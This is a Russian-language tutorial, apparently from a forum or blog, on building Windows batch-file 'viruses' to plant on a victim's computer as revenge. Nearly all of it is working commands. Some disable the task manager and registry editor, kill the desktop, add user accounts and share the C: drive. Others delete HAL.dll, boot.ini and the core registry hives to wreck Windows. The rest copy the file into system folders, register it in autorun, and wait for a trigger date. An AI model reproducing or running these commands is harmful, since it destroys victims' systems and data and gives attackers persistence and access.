В этой статье я раскажу о bat вирусах и как создать такие вирусы итак начнём:

Чтобы вирус запустился, нам нужны:

1) права администратора на компьютере жертвы
2) (желательно) Windows XP SP3 или старее на компьютере жертвы

Создаем файл .BAT, открываем в Notepad++ или другом редакторе и пишем, заведомо наслаждаясь местью…

Пишем. Для начала включим режим Безпалевности:

@echo off cmd /c

Теперь думаем: что будет делать вирус.

 Есть огромное число вариантов:

МОЖНО ПОШУТИТЬ

Запретить диспетчер задач reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

------------------------------------------------------------------------------------------------------------------------------------------------------

Удалить обои
del "%systemroot%\Web\Wallpaper\*.jpg"

Убрать рабочий стол
taskkill /f /im explorer.exe
------------------------------------------------------------------------------------------------------------------------------------------------------




Убрать панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

------------------------------------------------------------------------------------------------------------------------------------------------------




Запретить изменять и читать реестр
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

------------------------------------------------------------------------------------------------------------------------------------------------------

Убрать значки рабочего стола
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f


------------------------------------------------------------------------------------------------------------------------------------------------------


Отключить комп
shutdown -s -t 1 -c -f 

------------------------------------------------------------------------------------------------------------------------------------------------------




Перезагрузить комп
shutdown -r -t 1 -c -f 

------------------------------------------------------------------------------------------------------------------------------------------------------




Самоликвидироваться
del %0 


------------------------------------------------------------------------------------------------------------------------------------------------------





Создать учетную запись (поставьте своё)
net user Имя_юзера /add

------------------------------------------------------------------------------------------------------------------------------------------------------




Поменять название корзинки (поставьте своё)
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ 
/d Помойка ламера /F

------------------------------------------------------------------------------------------------------------------------------------------------------




Поменять название харда (поставьте своё)
label %новая_метка% Хард лоха

------------------------------------------------------------------------------------------------------------------------------------------------------

Вынести жестянку на паблик (диск в общий доступ, поставьте своё)
net share qwert$=c:\


------------------------------------------------------------------------------------------------------------------------------------------------------
А МОЖНО СНЕСТИ ВИНДУ!

Удалить ядро системы:

del %systemroot%\system32\HAL.dll

Удалить конфигурацию загрузки ОС: attrib -h -s c:\boot.ini del c:\boot.ini

Удалить основные разделы реестра (можно использовать по отдельности): reg delete HKLM\Software /f reg delete HKCU\Software /f

------------------------------------------------------------------------------------------------------------------------------------------------------

МОЖНО ПОСТАВИТЬ ТИХОЕ СИДЕНИЕ В СИСТЕМЕ…

Подождать до такого-то числа (поставьте свою дату) rem === Здесь проверяется дата ===  if %date% GEQ 30.09.2011 goto m goto c :m rem === Здесь начинается вирус === echo Это вирус)))) echo Надеюсь, вы не полные дураки, echo чтобы оставить эти строки))) rem === Если рано, спокойно завершаемся... === :c exit

------------------------------------------------------------------------------------------------------------------------------------------------------

МОЖНО РАЗМНОЖИТЬСЯ ПО СИСТЕМНЫМ ПАПКАМ И ДОБАВИТЬСЯ В AUTORUN

Саморазмножение copy /y %0 %windir% copy /y %0 %windir%\system32\drivers\ copy /y %0 %systemroot%\ copy /y %0 %systemdrive%\

Добавляемся в автозагрузку reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %random% /t REG_SZ /f /d %0 >nul reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %random% /t REG_SZ /f /d %windir%\autoexec.bat >nul reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %random% /t REG_SZ /f /d %windir%\system32\drivers\autoexec.bat >nul reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %random% /t REG_SZ /f /d %systemdrive%\autoexec.bat >nul

------------------------------------------------------------------------------------------------------------------------------------------------------

И это далеко не все…